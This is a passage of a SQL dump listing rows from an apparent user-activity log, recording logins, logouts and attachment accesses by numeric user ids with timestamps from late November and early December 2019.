09:39:55',NULL),(22830,26,'Login',26,'2019-11-21 15:21:37','2019-11-21 15:21:37',NULL),(22831,26,'Login',26,'2019-11-21 16:58:08','2019-11-21 16:58:08',NULL),(22832,50,'Attachment',980,'2019-11-21 17:36:22','2019-11-21 17:36:22',NULL),(22833,46,'Attachment',956,'2019-11-21 18:00:10','2019-11-21 18:00:10',NULL),(22834,50,'Login',50,'2019-11-22 08:39:05','2019-11-22 08:39:05',NULL),(22835,46,'Login',46,'2019-11-22 08:48:36','2019-11-22 08:48:36',NULL),(22836,65,'Login',65,'2019-11-22 09:14:06','2019-11-22 09:14:06',NULL),(22837,49,'Login',49,'2019-11-22 09:14:10','2019-11-22 09:14:10',NULL),(22838,49,'Login',49,'2019-11-22 14:58:27','2019-11-22 14:58:27',NULL),(22839,49,'Attachment',757,'2019-11-22 15:45:30','2019-11-22 15:45:30',NULL),(22840,49,'Attachment',24,'2019-11-22 15:45:30','2019-11-22 15:45:30',NULL),(22841,49,'Attachment',29,'2019-11-22 15:45:30','2019-11-22 15:45:30',NULL),(22842,49,'Attachment',419,'2019-11-22 15:45:30','2019-11-22 15:45:30',NULL),(22843,49,'Attachment',416,'2019-11-22 15:45:30','2019-11-22 15:45:30',NULL),(22844,2,'Attachment',757,'2019-11-22 18:10:32','2019-11-22 18:10:32',NULL),(22845,2,'Attachment',29,'2019-11-22 18:10:33','2019-11-22 18:10:33',NULL),(22846,2,'Attachment',24,'2019-11-22 18:10:33','2019-11-22 18:10:33',NULL),(22847,2,'Attachment',288,'2019-11-22 18:10:33','2019-11-22 18:10:33',NULL),(22848,2,'Attachment',419,'2019-11-22 18:10:33','2019-11-22 18:10:33',NULL),(22849,2,'Attachment',416,'2019-11-22 18:10:33','2019-11-22 18:10:33',NULL),(22850,2,'Attachment',181,'2019-11-22 18:10:33','2019-11-22 18:10:33',NULL),(22851,46,'Attachment',757,'2019-11-22 18:18:56','2019-11-22 18:18:56',NULL),(22852,46,'Attachment',29,'2019-11-22 18:18:56','2019-11-22 18:18:56',NULL),(22853,46,'Attachment',24,'2019-11-22 18:18:56','2019-11-22 18:18:56',NULL),(22854,46,'Attachment',416,'2019-11-22 18:18:56','2019-11-22 18:18:56',NULL),(22855,46,'Attachment',419,'2019-11-22 18:18:56','2019-11-22 18:18:56',NULL),(22856,46,'Attachment',288,'2019-11-22 18:18:56','2019-11-22 18:18:56',NULL),(22857,46,'Attachment',181,'2019-11-22 18:18:56','2019-11-22 18:18:56',NULL),(22858,2,'Attachment',29,'2019-11-24 05:54:45','2019-11-24 05:54:45',NULL),(22859,2,'Attachment',757,'2019-11-24 05:54:45','2019-11-24 05:54:45',NULL),(22860,2,'Attachment',24,'2019-11-24 05:54:45','2019-11-24 05:54:45',NULL),(22861,2,'Attachment',416,'2019-11-24 05:54:47','2019-11-24 05:54:47',NULL),(22862,2,'Attachment',419,'2019-11-24 05:54:47','2019-11-24 05:54:47',NULL),(22863,2,'Attachment',288,'2019-11-24 05:54:47','2019-11-24 05:54:47',NULL),(22864,2,'Attachment',181,'2019-11-24 05:54:48','2019-11-24 05:54:48',NULL),(22865,49,'Login',49,'2019-11-24 12:07:29','2019-11-24 12:07:29',NULL),(22866,65,'Login',65,'2019-11-24 12:55:07','2019-11-24 12:55:07',NULL),(22867,50,'Login',50,'2019-11-24 16:30:36','2019-11-24 16:30:36',NULL),(22868,46,'Login',46,'2019-11-24 19:37:30','2019-11-24 19:37:30',NULL),(22869,59,'Login',59,'2019-11-24 20:36:30','2019-11-24 20:36:30',NULL),(22870,50,'Attachment',571,'2019-11-24 20:47:16','2019-11-24 20:47:16',NULL),(22871,50,'Attachment',569,'2019-11-24 20:47:16','2019-11-24 20:47:16',NULL),(22872,50,'Attachment',570,'2019-11-24 20:47:16','2019-11-24 20:47:16',NULL),(22873,50,'Attachment',572,'2019-11-24 20:47:16','2019-11-24 20:47:16',NULL),(22874,50,'Attachment',574,'2019-11-24 20:47:16','2019-11-24 20:47:16',NULL),(22875,50,'Attachment',573,'2019-11-24 20:47:16','2019-11-24 20:47:16',NULL),(22876,50,'Attachment',576,'2019-11-24 20:47:18','2019-11-24 20:47:18',NULL),(22877,50,'Attachment',575,'2019-11-24 20:47:18','2019-11-24 20:47:18',NULL),(22878,49,'Attachment',950,'2019-11-25 06:01:17','2019-11-25 06:01:17',NULL),(22879,50,'Login',50,'2019-11-25 08:56:36','2019-11-25 08:56:36',NULL),(22880,50,'Attachment',570,'2019-11-25 08:58:31','2019-11-25 08:58:31',NULL),(22881,50,'Attachment',569,'2019-11-25 08:58:31','2019-11-25 08:58:31',NULL),(22882,50,'Attachment',572,'2019-11-25 08:58:31','2019-11-25 08:58:31',NULL),(22883,50,'Attachment',574,'2019-11-25 08:58:31','2019-11-25 08:58:31',NULL),(22884,50,'Attachment',575,'2019-11-25 08:58:31','2019-11-25 08:58:31',NULL),(22885,50,'Attachment',576,'2019-11-25 08:58:31','2019-11-25 08:58:31',NULL),(22886,49,'Attachment',757,'2019-11-25 10:39:12','2019-11-25 10:39:12',NULL),(22887,49,'Attachment',24,'2019-11-25 10:39:12','2019-11-25 10:39:12',NULL),(22888,49,'Attachment',29,'2019-11-25 10:39:12','2019-11-25 10:39:12',NULL),(22889,49,'Attachment',419,'2019-11-25 10:39:12','2019-11-25 10:39:12',NULL),(22890,49,'Attachment',416,'2019-11-25 10:39:12','2019-11-25 10:39:12',NULL),(22891,49,'Attachment',288,'2019-11-25 10:39:12','2019-11-25 10:39:12',NULL),(22892,49,'Attachment',181,'2019-11-25 10:39:12','2019-11-25 10:39:12',NULL),(22893,49,'Login',49,'2019-11-25 10:59:08','2019-11-25 10:59:08',NULL),(22894,50,'Login',50,'2019-11-25 10:59:10','2019-11-25 10:59:10',NULL),(22895,2,'Attachment',29,'2019-11-25 11:05:12','2019-11-25 11:05:12',NULL),(22896,2,'Attachment',24,'2019-11-25 11:05:12','2019-11-25 11:05:12',NULL),(22897,2,'Attachment',757,'2019-11-25 11:05:12','2019-11-25 11:05:12',NULL),(22898,2,'Attachment',181,'2019-11-25 11:05:12','2019-11-25 11:05:12',NULL),(22899,2,'Attachment',416,'2019-11-25 11:05:12','2019-11-25 11:05:12',NULL),(22900,2,'Attachment',288,'2019-11-25 11:05:12','2019-11-25 11:05:12',NULL),(22901,2,'Attachment',419,'2019-11-25 11:05:12','2019-11-25 11:05:12',NULL),(22902,49,'Attachment',757,'2019-11-25 11:10:49','2019-11-25 11:10:49',NULL),(22903,49,'Attachment',29,'2019-11-25 11:10:49','2019-11-25 11:10:49',NULL),(22904,49,'Attachment',546,'2019-11-25 11:10:56','2019-11-25 11:10:56',NULL),(22905,49,'Attachment',535,'2019-11-25 11:10:56','2019-11-25 11:10:56',NULL),(22906,49,'Attachment',753,'2019-11-25 11:10:56','2019-11-25 11:10:56',NULL),(22907,49,'Attachment',755,'2019-11-25 11:10:57','2019-11-25 11:10:57',NULL),(22908,49,'Attachment',539,'2019-11-25 11:10:57','2019-11-25 11:10:57',NULL),(22909,49,'Attachment',538,'2019-11-25 11:10:58','2019-11-25 11:10:58',NULL),(22910,49,'Attachment',541,'2019-11-25 11:11:15','2019-11-25 11:11:15',NULL),(22911,49,'Attachment',180,'2019-11-25 11:11:15','2019-11-25 11:11:15',NULL),(22912,49,'Attachment',403,'2019-11-25 11:11:15','2019-11-25 11:11:15',NULL),(22913,49,'Attachment',354,'2019-11-25 11:11:15','2019-11-25 11:11:15',NULL),(22914,49,'Attachment',371,'2019-11-25 11:11:15','2019-11-25 11:11:15',NULL),(22915,49,'Attachment',69,'2019-11-25 11:11:15','2019-11-25 11:11:15',NULL),(22916,50,'Attachment',69,'2019-11-25 11:11:53','2019-11-25 11:11:53',NULL),(22917,50,'Attachment',371,'2019-11-25 11:11:53','2019-11-25 11:11:53',NULL),(22918,50,'Attachment',354,'2019-11-25 11:11:53','2019-11-25 11:11:53',NULL),(22919,50,'Attachment',180,'2019-11-25 11:11:53','2019-11-25 11:11:53',NULL),(22920,73,'Logout',73,'2019-11-25 11:30:58','2019-11-25 11:30:58',NULL),(22921,73,'Login',73,'2019-11-25 11:38:14','2019-11-25 11:38:14',NULL),(22922,73,'Logout',73,'2019-11-25 11:38:26','2019-11-25 11:38:26',NULL),(22923,73,'Login',73,'2019-11-25 12:25:28','2019-11-25 12:25:28',NULL),(22924,49,'Attachment',181,'2019-11-25 12:31:15','2019-11-25 12:31:15',NULL),(22925,49,'Attachment',29,'2019-11-25 12:31:15','2019-11-25 12:31:15',NULL),(22926,49,'Attachment',757,'2019-11-25 12:31:15','2019-11-25 12:31:15',NULL),(22927,49,'Attachment',416,'2019-11-25 12:31:15','2019-11-25 12:31:15',NULL),(22928,49,'Attachment',24,'2019-11-25 12:31:15','2019-11-25 12:31:15',NULL),(22929,49,'Attachment',419,'2019-11-25 12:31:15','2019-11-25 12:31:15',NULL),(22930,49,'Attachment',288,'2019-11-25 12:31:15','2019-11-25 12:31:15',NULL),(22931,2,'Attachment',757,'2019-11-25 15:25:19','2019-11-25 15:25:19',NULL),(22932,2,'Attachment',29,'2019-11-25 15:25:19','2019-11-25 15:25:19',NULL),(22933,2,'Attachment',288,'2019-11-25 15:25:19','2019-11-25 15:25:19',NULL),(22934,2,'Attachment',419,'2019-11-25 15:25:19','2019-11-25 15:25:19',NULL),(22935,2,'Attachment',24,'2019-11-25 15:25:19','2019-11-25 15:25:19',NULL),(22936,2,'Attachment',181,'2019-11-25 15:25:19','2019-11-25 15:25:19',NULL),(22937,2,'Attachment',546,'2019-11-25 15:25:30','2019-11-25 15:25:30',NULL),(22938,2,'Attachment',539,'2019-11-25 15:25:30','2019-11-25 15:25:30',NULL),(22939,2,'Attachment',538,'2019-11-25 15:25:30','2019-11-25 15:25:30',NULL),(22940,2,'Attachment',535,'2019-11-25 15:25:30','2019-11-25 15:25:30',NULL),(22941,2,'Attachment',541,'2019-11-25 15:25:30','2019-11-25 15:25:30',NULL),(22942,2,'Attachment',416,'2019-11-25 15:25:30','2019-11-25 15:25:30',NULL),(22943,2,'Attachment',403,'2019-11-25 15:25:31','2019-11-25 15:25:31',NULL),(22944,2,'Attachment',180,'2019-11-25 15:25:31','2019-11-25 15:25:31',NULL),(22945,2,'Attachment',371,'2019-11-25 15:25:31','2019-11-25 15:25:31',NULL),(22946,2,'Attachment',14,'2019-11-25 15:25:31','2019-11-25 15:25:31',NULL),(22947,2,'Attachment',69,'2019-11-25 15:25:31','2019-11-25 15:25:31',NULL),(22948,2,'Attachment',354,'2019-11-25 15:25:31','2019-11-25 15:25:31',NULL),(22949,2,'Attachment',36,'2019-11-25 15:25:31','2019-11-25 15:25:31',NULL),(22950,2,'Attachment',757,'2019-11-25 16:04:26','2019-11-25 16:04:26',NULL),(22951,2,'Attachment',29,'2019-11-25 16:04:26','2019-11-25 16:04:26',NULL),(22952,2,'Attachment',24,'2019-11-25 16:04:26','2019-11-25 16:04:26',NULL),(22953,2,'Attachment',288,'2019-11-25 16:04:27','2019-11-25 16:04:27',NULL),(22954,2,'Attachment',419,'2019-11-25 16:04:27','2019-11-25 16:04:27',NULL),(22955,2,'Attachment',181,'2019-11-25 16:04:28','2019-11-25 16:04:28',NULL),(22956,50,'Login',50,'2019-11-25 16:04:32','2019-11-25 16:04:32',NULL),(22957,49,'Logout',49,'2019-11-25 16:06:49','2019-11-25 16:06:49',NULL),(22958,2,'Attachment',757,'2019-11-25 16:06:50','2019-11-25 16:06:50',NULL),(22959,2,'Attachment',181,'2019-11-25 16:06:50','2019-11-25 16:06:50',NULL),(22960,2,'Attachment',419,'2019-11-25 16:06:50','2019-11-25 16:06:50',NULL),(22961,2,'Attachment',24,'2019-11-25 16:06:50','2019-11-25 16:06:50',NULL),(22962,2,'Attachment',288,'2019-11-25 16:06:50','2019-11-25 16:06:50',NULL),(22963,2,'Attachment',29,'2019-11-25 16:06:50','2019-11-25 16:06:50',NULL),(22964,49,'Login',49,'2019-11-25 16:07:01','2019-11-25 16:07:01',NULL),(22965,73,'Logout',73,'2019-11-25 16:12:58','2019-11-25 16:12:58',NULL),(22966,63,'Login',63,'2019-11-25 16:13:01','2019-11-25 16:13:01',NULL),(22967,50,'Login',50,'2019-11-25 17:00:56','2019-11-25 17:00:56',NULL),(22968,50,'Logout',50,'2019-11-25 17:13:15','2019-11-25 17:13:15',NULL),(22969,61,'Login',61,'2019-11-25 17:13:22','2019-11-25 17:13:22',NULL),(22970,2,'Attachment',757,'2019-11-26 09:27:12','2019-11-26 09:27:12',NULL),(22971,2,'Attachment',29,'2019-11-26 09:27:12','2019-11-26 09:27:12',NULL),(22972,2,'Attachment',24,'2019-11-26 09:27:12','2019-11-26 09:27:12',NULL),(22973,2,'Attachment',419,'2019-11-26 09:27:12','2019-11-26 09:27:12',NULL),(22974,2,'Attachment',288,'2019-11-26 09:27:12','2019-11-26 09:27:12',NULL),(22975,2,'Attachment',181,'2019-11-26 09:27:12','2019-11-26 09:27:12',NULL),(22976,2,'Attachment',24,'2019-11-26 09:42:13','2019-11-26 09:42:13',NULL),(22977,2,'Attachment',419,'2019-11-26 09:42:13','2019-11-26 09:42:13',NULL),(22978,2,'Attachment',288,'2019-11-26 09:42:13','2019-11-26 09:42:13',NULL),(22979,2,'Attachment',416,'2019-11-26 10:32:27','2019-11-26 10:32:27',NULL),(22980,2,'Attachment',418,'2019-11-26 10:32:41','2019-11-26 10:32:41',NULL),(22981,2,'Attachment',417,'2019-11-26 10:32:41','2019-11-26 10:32:41',NULL),(22982,2,'Attachment',757,'2019-11-26 11:07:49','2019-11-26 11:07:49',NULL),(22983,2,'Attachment',29,'2019-11-26 11:07:49','2019-11-26 11:07:49',NULL),(22984,2,'Attachment',24,'2019-11-26 11:07:49','2019-11-26 11:07:49',NULL),(22985,2,'Attachment',419,'2019-11-26 11:07:49','2019-11-26 11:07:49',NULL),(22986,2,'Attachment',181,'2019-11-26 11:07:49','2019-11-26 11:07:49',NULL),(22987,2,'Attachment',288,'2019-11-26 11:07:49','2019-11-26 11:07:49',NULL),(22988,46,'Login',46,'2019-11-26 11:08:45','2019-11-26 11:08:45',NULL),(22989,2,'Attachment',260,'2019-11-26 11:11:56','2019-11-26 11:11:56',NULL),(22990,2,'Attachment',261,'2019-11-26 11:11:56','2019-11-26 11:11:56',NULL),(22991,2,'Attachment',263,'2019-11-26 11:11:56','2019-11-26 11:11:56',NULL),(22992,2,'Attachment',262,'2019-11-26 11:11:56','2019-11-26 11:11:56',NULL),(22993,2,'Attachment',267,'2019-11-26 11:11:56','2019-11-26 11:11:56',NULL),(22994,2,'Attachment',259,'2019-11-26 11:11:56','2019-11-26 11:11:56',NULL),(22995,2,'Attachment',265,'2019-11-26 11:11:56','2019-11-26 11:11:56',NULL),(22996,2,'Attachment',264,'2019-11-26 11:11:56','2019-11-26 11:11:56',NULL),(22997,46,'Attachment',24,'2019-11-26 11:38:09','2019-11-26 11:38:09',NULL),(22998,46,'Attachment',29,'2019-11-26 11:38:09','2019-11-26 11:38:09',NULL),(22999,2,'Attachment',757,'2019-11-26 14:20:35','2019-11-26 14:20:35',NULL),(23000,2,'Attachment',288,'2019-11-26 14:20:35','2019-11-26 14:20:35',NULL),(23001,2,'Attachment',29,'2019-11-26 14:20:36','2019-11-26 14:20:36',NULL),(23002,2,'Attachment',24,'2019-11-26 14:20:36','2019-11-26 14:20:36',NULL),(23003,2,'Attachment',419,'2019-11-26 14:20:36','2019-11-26 14:20:36',NULL),(23004,2,'Attachment',181,'2019-11-26 14:20:36','2019-11-26 14:20:36',NULL),(23005,52,'Login',52,'2019-11-26 14:41:36','2019-11-26 14:41:36',NULL),(23006,52,'Login',52,'2019-11-26 14:57:49','2019-11-26 14:57:49',NULL),(23007,2,'Attachment',757,'2019-11-26 15:05:55','2019-11-26 15:05:55',NULL),(23008,2,'Attachment',29,'2019-11-26 15:05:55','2019-11-26 15:05:55',NULL),(23009,2,'Attachment',288,'2019-11-26 15:05:55','2019-11-26 15:05:55',NULL),(23010,2,'Attachment',24,'2019-11-26 15:05:55','2019-11-26 15:05:55',NULL),(23011,2,'Attachment',419,'2019-11-26 15:05:55','2019-11-26 15:05:55',NULL),(23012,2,'Attachment',181,'2019-11-26 15:05:55','2019-11-26 15:05:55',NULL),(23013,2,'Attachment',546,'2019-11-26 15:05:56','2019-11-26 15:05:56',NULL),(23014,2,'Attachment',541,'2019-11-26 15:05:56','2019-11-26 15:05:56',NULL),(23015,2,'Attachment',535,'2019-11-26 15:05:56','2019-11-26 15:05:56',NULL),(23016,2,'Attachment',538,'2019-11-26 15:05:56','2019-11-26 15:05:56',NULL),(23017,2,'Attachment',539,'2019-11-26 15:05:56','2019-11-26 15:05:56',NULL),(23018,2,'Attachment',416,'2019-11-26 15:05:56','2019-11-26 15:05:56',NULL),(23019,2,'Attachment',403,'2019-11-26 15:05:57','2019-11-26 15:05:57',NULL),(23020,2,'Attachment',354,'2019-11-26 15:05:57','2019-11-26 15:05:57',NULL),(23021,2,'Attachment',371,'2019-11-26 15:05:57','2019-11-26 15:05:57',NULL),(23022,2,'Attachment',180,'2019-11-26 15:05:57','2019-11-26 15:05:57',NULL),(23023,2,'Attachment',69,'2019-11-26 15:05:57','2019-11-26 15:05:57',NULL),(23024,2,'Attachment',14,'2019-11-26 15:05:57','2019-11-26 15:05:57',NULL),(23025,2,'Attachment',36,'2019-11-26 15:05:57','2019-11-26 15:05:57',NULL),(23026,2,'Attachment',753,'2019-11-26 15:06:00','2019-11-26 15:06:00',NULL),(23027,2,'Attachment',755,'2019-11-26 15:06:01','2019-11-26 15:06:01',NULL),(23028,52,'Login',52,'2019-11-26 15:06:50','2019-11-26 15:06:50',NULL),(23029,2,'Attachment',757,'2019-11-26 15:13:23','2019-11-26 15:13:23',NULL),(23030,2,'Attachment',29,'2019-11-26 15:13:23','2019-11-26 15:13:23',NULL),(23031,2,'Attachment',24,'2019-11-26 15:13:23','2019-11-26 15:13:23',NULL),(23032,2,'Attachment',419,'2019-11-26 15:13:23','2019-11-26 15:13:23',NULL),(23033,2,'Attachment',181,'2019-11-26 15:13:23','2019-11-26 15:13:23',NULL),(23034,2,'Attachment',288,'2019-11-26 15:13:23','2019-11-26 15:13:23',NULL),(23035,2,'Attachment',757,'2019-11-26 15:17:36','2019-11-26 15:17:36',NULL),(23036,2,'Attachment',29,'2019-11-26 15:17:38','2019-11-26 15:17:38',NULL),(23037,2,'Attachment',24,'2019-11-26 15:17:38','2019-11-26 15:17:38',NULL),(23038,2,'Attachment',419,'2019-11-26 15:17:38','2019-11-26 15:17:38',NULL),(23039,2,'Attachment',288,'2019-11-26 15:17:38','2019-11-26 15:17:38',NULL),(23040,2,'Attachment',181,'2019-11-26 15:17:38','2019-11-26 15:17:38',NULL),(23041,2,'Attachment',541,'2019-11-26 15:17:41','2019-11-26 15:17:41',NULL),(23042,2,'Attachment',546,'2019-11-26 15:17:41','2019-11-26 15:17:41',NULL),(23043,2,'Attachment',538,'2019-11-26 15:17:41','2019-11-26 15:17:41',NULL),(23044,2,'Attachment',539,'2019-11-26 15:17:41','2019-11-26 15:17:41',NULL),(23045,2,'Attachment',535,'2019-11-26 15:17:41','2019-11-26 15:17:41',NULL),(23046,2,'Attachment',416,'2019-11-26 15:17:41','2019-11-26 15:17:41',NULL),(23047,2,'Attachment',757,'2019-11-26 15:22:00','2019-11-26 15:22:00',NULL),(23048,2,'Attachment',29,'2019-11-26 15:22:00','2019-11-26 15:22:00',NULL),(23049,2,'Attachment',24,'2019-11-26 15:22:00','2019-11-26 15:22:00',NULL),(23050,2,'Attachment',288,'2019-11-26 15:22:00','2019-11-26 15:22:00',NULL),(23051,2,'Attachment',419,'2019-11-26 15:22:00','2019-11-26 15:22:00',NULL),(23052,2,'Attachment',181,'2019-11-26 15:22:00','2019-11-26 15:22:00',NULL),(23053,2,'Attachment',24,'2019-11-26 15:46:18','2019-11-26 15:46:18',NULL),(23054,2,'Attachment',181,'2019-11-26 15:46:18','2019-11-26 15:46:18',NULL),(23055,2,'Attachment',419,'2019-11-26 15:46:18','2019-11-26 15:46:18',NULL),(23056,2,'Attachment',757,'2019-11-26 15:46:18','2019-11-26 15:46:18',NULL),(23057,2,'Attachment',288,'2019-11-26 15:46:18','2019-11-26 15:46:18',NULL),(23058,2,'Attachment',29,'2019-11-26 15:46:18','2019-11-26 15:46:18',NULL),(23059,2,'Attachment',757,'2019-11-26 16:32:41','2019-11-26 16:32:41',NULL),(23060,2,'Attachment',29,'2019-11-26 16:32:41','2019-11-26 16:32:41',NULL),(23061,2,'Attachment',24,'2019-11-26 16:32:41','2019-11-26 16:32:41',NULL),(23062,2,'Attachment',419,'2019-11-26 16:32:41','2019-11-26 16:32:41',NULL),(23063,2,'Attachment',288,'2019-11-26 16:32:41','2019-11-26 16:32:41',NULL),(23064,2,'Attachment',181,'2019-11-26 16:32:41','2019-11-26 16:32:41',NULL),(23065,2,'Attachment',29,'2019-11-26 16:50:15','2019-11-26 16:50:15',NULL),(23066,2,'Attachment',181,'2019-11-26 16:50:15','2019-11-26 16:50:15',NULL),(23067,2,'Attachment',288,'2019-11-26 16:50:15','2019-11-26 16:50:15',NULL),(23068,2,'Attachment',24,'2019-11-26 16:50:15','2019-11-26 16:50:15',NULL),(23069,2,'Attachment',419,'2019-11-26 16:50:15','2019-11-26 16:50:15',NULL),(23070,2,'Attachment',757,'2019-11-26 16:50:15','2019-11-26 16:50:15',NULL),(23071,2,'Attachment',757,'2019-11-26 17:02:57','2019-11-26 17:02:57',NULL),(23072,2,'Attachment',29,'2019-11-26 17:02:57','2019-11-26 17:02:57',NULL),(23073,2,'Attachment',24,'2019-11-26 17:02:57','2019-11-26 17:02:57',NULL),(23074,2,'Attachment',419,'2019-11-26 17:02:57','2019-11-26 17:02:57',NULL),(23075,2,'Attachment',288,'2019-11-26 17:02:57','2019-11-26 17:02:57',NULL),(23076,2,'Attachment',181,'2019-11-26 17:02:57','2019-11-26 17:02:57',NULL),(23077,2,'Attachment',757,'2019-11-27 01:35:59','2019-11-27 01:35:59',NULL),(23078,2,'Attachment',29,'2019-11-27 01:36:00','2019-11-27 01:36:00',NULL),(23079,2,'Attachment',24,'2019-11-27 01:36:01','2019-11-27 01:36:01',NULL),(23080,2,'Attachment',288,'2019-11-27 01:36:02','2019-11-27 01:36:02',NULL),(23081,2,'Attachment',181,'2019-11-27 01:36:02','2019-11-27 01:36:02',NULL),(23082,2,'Attachment',419,'2019-11-27 01:36:03','2019-11-27 01:36:03',NULL),(23083,2,'Attachment',181,'2019-11-28 07:24:13','2019-11-28 07:24:13',NULL),(23084,2,'Attachment',288,'2019-11-28 07:24:13','2019-11-28 07:24:13',NULL),(23085,2,'Attachment',757,'2019-11-28 07:24:13','2019-11-28 07:24:13',NULL),(23086,2,'Attachment',24,'2019-11-28 07:24:13','2019-11-28 07:24:13',NULL),(23087,2,'Attachment',29,'2019-11-28 07:24:13','2019-11-28 07:24:13',NULL),(23088,2,'Attachment',419,'2019-11-28 07:24:13','2019-11-28 07:24:13',NULL),(23089,2,'Attachment',757,'2019-11-28 16:11:09','2019-11-28 16:11:09',NULL),(23090,2,'Attachment',29,'2019-11-28 16:11:10','2019-11-28 16:11:10',NULL),(23091,2,'Attachment',24,'2019-11-28 16:11:10','2019-11-28 16:11:10',NULL),(23092,2,'Attachment',288,'2019-11-28 16:11:10','2019-11-28 16:11:10',NULL),(23093,2,'Attachment',419,'2019-11-28 16:11:10','2019-11-28 16:11:10',NULL),(23094,2,'Attachment',181,'2019-11-28 16:11:10','2019-11-28 16:11:10',NULL),(23095,2,'Attachment',757,'2019-11-28 16:16:22','2019-11-28 16:16:22',NULL),(23096,2,'Attachment',29,'2019-11-28 16:16:22','2019-11-28 16:16:22',NULL),(23097,2,'Attachment',24,'2019-11-28 16:16:22','2019-11-28 16:16:22',NULL),(23098,2,'Attachment',419,'2019-11-28 16:16:22','2019-11-28 16:16:22',NULL),(23099,2,'Attachment',288,'2019-11-28 16:16:22','2019-11-28 16:16:22',NULL),(23100,2,'Attachment',181,'2019-11-28 16:16:22','2019-11-28 16:16:22',NULL),(23101,2,'Attachment',546,'2019-11-28 16:19:30','2019-11-28 16:19:30',NULL),(23102,2,'Attachment',535,'2019-11-28 16:19:30','2019-11-28 16:19:30',NULL),(23103,2,'Attachment',753,'2019-11-28 16:19:30','2019-11-28 16:19:30',NULL),(23104,2,'Attachment',757,'2019-11-28 16:50:50','2019-11-28 16:50:50',NULL),(23105,2,'Attachment',29,'2019-11-28 16:50:50','2019-11-28 16:50:50',NULL),(23106,2,'Attachment',24,'2019-11-28 16:50:50','2019-11-28 16:50:50',NULL),(23107,2,'Attachment',419,'2019-11-28 16:50:50','2019-11-28 16:50:50',NULL),(23108,2,'Attachment',288,'2019-11-28 16:50:50','2019-11-28 16:50:50',NULL),(23109,2,'Attachment',181,'2019-11-28 16:50:50','2019-11-28 16:50:50',NULL),(23110,2,'Attachment',181,'2019-11-28 17:41:20','2019-11-28 17:41:20',NULL),(23111,2,'Attachment',181,'2019-11-28 17:41:21','2019-11-28 17:41:21',NULL),(23112,2,'Attachment',181,'2019-11-28 17:41:21','2019-11-28 17:41:21',NULL),(23113,2,'Attachment',181,'2019-11-28 17:41:21','2019-11-28 17:41:21',NULL),(23114,2,'Attachment',181,'2019-11-28 17:41:21','2019-11-28 17:41:21',NULL),(23115,2,'Attachment',24,'2019-11-28 17:41:21','2019-11-28 17:41:21',NULL),(23116,2,'Attachment',288,'2019-11-28 17:41:21','2019-11-28 17:41:21',NULL),(23117,2,'Attachment',181,'2019-11-28 17:41:21','2019-11-28 17:41:21',NULL),(23118,2,'Attachment',181,'2019-11-28 17:41:22','2019-11-28 17:41:22',NULL),(23119,2,'Attachment',181,'2019-11-28 17:41:22','2019-11-28 17:41:22',NULL),(23120,2,'Attachment',181,'2019-11-28 17:41:22','2019-11-28 17:41:22',NULL),(23121,2,'Attachment',181,'2019-11-28 17:41:22','2019-11-28 17:41:22',NULL),(23122,2,'Attachment',181,'2019-11-28 17:41:22','2019-11-28 17:41:22',NULL),(23123,2,'Attachment',181,'2019-11-28 17:41:23','2019-11-28 17:41:23',NULL),(23124,2,'Attachment',181,'2019-11-28 17:41:23','2019-11-28 17:41:23',NULL),(23125,2,'Attachment',24,'2019-11-29 05:23:39','2019-11-29 05:23:39',NULL),(23126,2,'Attachment',419,'2019-11-29 05:23:39','2019-11-29 05:23:39',NULL),(23127,2,'Attachment',757,'2019-11-29 05:23:39','2019-11-29 05:23:39',NULL),(23128,2,'Attachment',29,'2019-11-29 05:23:39','2019-11-29 05:23:39',NULL),(23129,2,'Attachment',181,'2019-11-29 05:23:39','2019-11-29 05:23:39',NULL),(23130,2,'Attachment',288,'2019-11-29 05:23:39','2019-11-29 05:23:39',NULL),(23131,2,'Attachment',181,'2019-11-29 16:46:11','2019-11-29 16:46:11',NULL),(23132,2,'Attachment',288,'2019-11-29 16:46:11','2019-11-29 16:46:11',NULL),(23133,2,'Attachment',757,'2019-11-29 16:46:11','2019-11-29 16:46:11',NULL),(23134,2,'Attachment',24,'2019-11-29 16:46:11','2019-11-29 16:46:11',NULL),(23135,2,'Attachment',29,'2019-11-29 16:46:11','2019-11-29 16:46:11',NULL),(23136,2,'Attachment',419,'2019-11-29 16:46:11','2019-11-29 16:46:11',NULL),(23137,2,'Attachment',757,'2019-11-30 09:10:25','2019-11-30 09:10:25',NULL),(23138,2,'Attachment',288,'2019-11-30 09:10:25','2019-11-30 09:10:25',NULL),(23139,2,'Attachment',181,'2019-11-30 09:10:25','2019-11-30 09:10:25',NULL),(23140,2,'Attachment',24,'2019-11-30 09:10:25','2019-11-30 09:10:25',NULL),(23141,2,'Attachment',419,'2019-11-30 09:10:25','2019-11-30 09:10:25',NULL),(23142,2,'Attachment',29,'2019-11-30 09:10:25','2019-11-30 09:10:25',NULL),(23143,2,'Attachment',29,'2019-12-02 09:41:56','2019-12-02 09:41:56',NULL),(23144,2,'Attachment',419,'2019-12-02 09:41:56','2019-12-02 09:41:56',NULL),(23145,2,'Attachment',181,'2019-12-02 09:41:56','2019-12-02 09:41:56',NULL),(23146,2,'Attachment',546,'2019-12-02 17:50:31','2019-12-02 17:50:31',NULL),(23147,2,'Attachment',541,'2019-12-02 17:50:31','2019-12-02 17:50:31',NULL),(23148,2,'Attachment',539,'2019-12-02 17:50:31','2019-12-02 17:50:31',NULL),(23149,2,'Attachment',535,'2019-12-02 17:50:31','2019-12-02 17:50:31',NULL),(23150,2,'Attachment',538,'2019-12-02 17:50:31','2019-12-02 17:50:31',NULL),(23151,2,'Attachment',416,'2019-12-02 17:50:31','2019-12-02 17:50:31',NULL),(23152,2,'Attachment',403,'2019-12-02 17:50:32','2019-12-02 17:50:32',NULL),(23153,2,'Attachment',354,'2019-12-02 17:50:32','2019-12-02 17:50:32',NULL),(23154,2,'Attachment',180,'2019-12-02 17:50:32','2019-12-02 17:50:32',NULL),(23155,2,'Attachment',371,'2019-12-02 17:50:32','2019-12-02 17:50:32',NULL),(23156,2,'Attachment',69,'2019-12-02 17:50:32','2019-12-02 17:50:32',NULL),(23157,2,'Attachment',14,'2019-12-02 17:50:32','2019-12-02 17:50:32',NULL),(23158,2,'Attachment',36,'2019-12-02 17:50:32','2019-12-02 17:50:32',NULL),(23159,2,'Attachment',753,'2019-12-02 17:50:37','2019-12-02 17:50:37',NULL),(23160,2,'Attachment',755,'2019-12-02 17:50:39','2019-12-02 17:50:39',NULL),(23161,2,'Attachment',24,'2019-12-02 19:47:24','2019-12-02 19:47:24',NULL),(23162,2,'Attachment',419,'2019-12-02 19:47:24','2019-12-02 19:47:24',NULL),(23163,2,'Attachment',757,'2019-12-02 19:47:24','2019-12-02 